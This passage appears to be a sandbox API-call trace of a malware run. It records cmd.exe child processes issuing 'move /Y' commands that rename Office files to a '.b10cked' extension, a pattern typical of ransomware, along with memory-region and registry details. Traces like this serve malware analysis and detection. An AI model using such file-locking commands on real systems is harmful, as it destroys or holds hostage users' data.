[0157.133] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0157.133] _wcsicmp (_String1="OUTLLI~2.TRX", _String2=".") returned 65 [0157.133] _wcsicmp 
(_String1="OUTLLI~2.TRX", _String2="..") returned 65 [0157.133] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlli~2.trx")) returned 0x2020 [0157.399] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.399] SetErrorMode (uMode=0x0) returned 0x0 [0157.399] SetErrorMode (uMode=0x1) returned 0x0 [0157.399] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", nBufferLength=0x104, lpBuffer=0x16ee14, lpFilePart=0x16edfc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", lpFilePart=0x16edfc*="OUTLLI~2.TRX") returned 0x3c [0157.399] SetErrorMode (uMode=0x0) returned 0x1 [0157.399] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0157.399] _wcsicmp (_String1="OUTLLI~2.TRX", _String2=".") returned 65 [0157.399] _wcsicmp (_String1="OUTLLI~2.TRX", _String2="..") returned 65 [0157.399] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlli~2.trx")) returned 0x2020 [0157.399] SetErrorMode (uMode=0x0) returned 0x0 [0157.399] SetErrorMode (uMode=0x1) returned 0x0 [0157.399] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", nBufferLength=0x104, lpBuffer=0x16f290, lpFilePart=0x16f028 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", lpFilePart=0x16f028*="OUTLLI~2.TRX") returned 0x3c [0157.399] SetErrorMode (uMode=0x0) returned 0x1 [0157.399] SetErrorMode (uMode=0x0) returned 0x0 [0157.400] SetErrorMode (uMode=0x1) returned 0x0 [0157.400] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16f498, lpFilePart=0x16f028 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked", lpFilePart=0x16f028*="OUTLLIBR.REST.trx_dll.b10cked") returned 0x4d [0157.400] SetErrorMode (uMode=0x0) returned 0x1 [0157.400] SetLastError (dwErrCode=0x0) [0157.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.rest.trx_dll.b10cked")) returned 0xffffffff [0157.400] GetLastError () returned 0x2 [0157.400] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x16e9a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9a4) returned 0x282138 [0157.400] FindNextFileW (in: hFindFile=0x282138, lpFindFileData=0x16e9a4 | out: lpFindFileData=0x16e9a4) returned 0 [0157.400] GetLastError () returned 0x12 [0157.400] FindClose (in: hFindFile=0x282138 | out: hFindFile=0x282138) returned 1 [0157.402] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x281cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281cc8) returned 0x282138 [0157.402] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16ec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0157.402] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x16ec3c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0157.402] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.rest.trx_dll")) returned 0x2020 [0157.402] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0157.402] FindClose (in: hFindFile=0x282138 | out: hFindFile=0x282138) returned 1 [0157.403] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ebf0 | out: _Buffer=" 1") returned 9 [0157.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.403] GetFileType (hFile=0x7) returned 0x2 [0157.403] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.403] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16eb7c | out: lpMode=0x16eb7c) returned 1 [0157.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ebb0 | out: lpConsoleScreenBufferInfo=0x16ebb0) returned 1 [0157.403] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0157.403] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ebf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0157.404] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x16ebd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ebd4*=0x1a) returned 1 [0157.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.404] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.404] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.404] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.404] SetConsoleInputExeNameW () returned 0x1 [0157.404] GetConsoleOutputCP () returned 0x1b5 [0157.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.404] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.405] exit (_Code=0) Process: id = "262" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xd8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21625 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21626 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21627 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21628 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 21629 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21630 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21631 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21632 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21633 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21634 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21659 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21660 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21661 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21662 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 21663 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 21664 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21665 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21666 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21667 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21668 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21669 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21670 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21671 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21672 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21673 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21674 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21675 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21676 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 21677 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 21678 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 21679 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 21680 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 21681 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 21682 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x0000000001230000" filename = "" Thread: id = 325 os_tid = 0x3dc [0157.101] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af894 | out: lpSystemTimeAsFileTime=0x2af894*(dwLowDateTime=0x9793ede0, dwHighDateTime=0x1d440a9)) [0157.101] GetCurrentProcessId () returned 0xd8c [0157.101] GetCurrentThreadId () returned 0x3dc [0157.101] GetTickCount () returned 0x3029e [0157.101] QueryPerformanceCounter (in: lpPerformanceCount=0x2af88c | out: lpPerformanceCount=0x2af88c*=21389041055) returned 1 [0157.102] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0157.102] __set_app_type (_Type=0x1) [0157.102] __p__fmode () returned 0x76b331f4 [0157.102] __p__commode () returned 0x76b331fc [0157.102] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0157.102] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0157.102] GetCurrentThreadId () returned 0x3dc [0157.102] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3dc) returned 0x38 [0157.102] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.102] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0157.102] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.103] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0157.103] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af824 | out: phkResult=0x2af824*=0x0) returned 0x2 [0157.103] VirtualQuery (in: lpAddress=0x2af85b, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.103] VirtualQuery (in: 
lpAddress=0x1b0000, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0157.103] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0157.103] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.103] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.103] GetConsoleOutputCP () returned 0x1b5 [0157.103] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.103] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0157.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.103] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0157.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.104] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.104] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.104] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.104] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.104] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.104] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0157.104] GetEnvironmentStringsW () returned 0x430210* [0157.104] 
FreeEnvironmentStringsW (penv=0x430210) returned 1 [0157.104] GetEnvironmentStringsW () returned 0x430210* [0157.104] FreeEnvironmentStringsW (penv=0x430210) returned 1 [0157.104] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae794 | out: phkResult=0x2ae794*=0x40) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0xa0, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x1, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0x1, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x0, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x40, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x40, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, 
lpData=0x2ae7a0*=0x40, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegCloseKey (hKey=0x40) returned 0x0 [0157.105] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae794 | out: phkResult=0x2ae794*=0x40) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0x40, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x1, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0x1, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x0, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x9, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x9, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0x9, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] 
RegCloseKey (hKey=0x40) returned 0x0 [0157.105] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637f [0157.105] srand (_Seed=0x5b88637f) [0157.105] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"" [0157.105] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"" [0157.106] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.106] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x431970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0157.106] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0157.106] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0157.106] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.106] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0157.106] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0157.106] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0157.106] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0157.106] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0157.106] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0157.106] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0157.106] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0157.106] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0157.106] GetEnvironmentStringsW () returned 0x432360* [0157.106] FreeEnvironmentStringsW (penv=0x432360) returned 1 [0157.107] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.107] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.107] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0157.107] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0157.107] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0157.107] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0157.107] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0157.107] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0157.107] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0157.107] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0157.107] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af560 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.107] GetFullPathNameW (in: 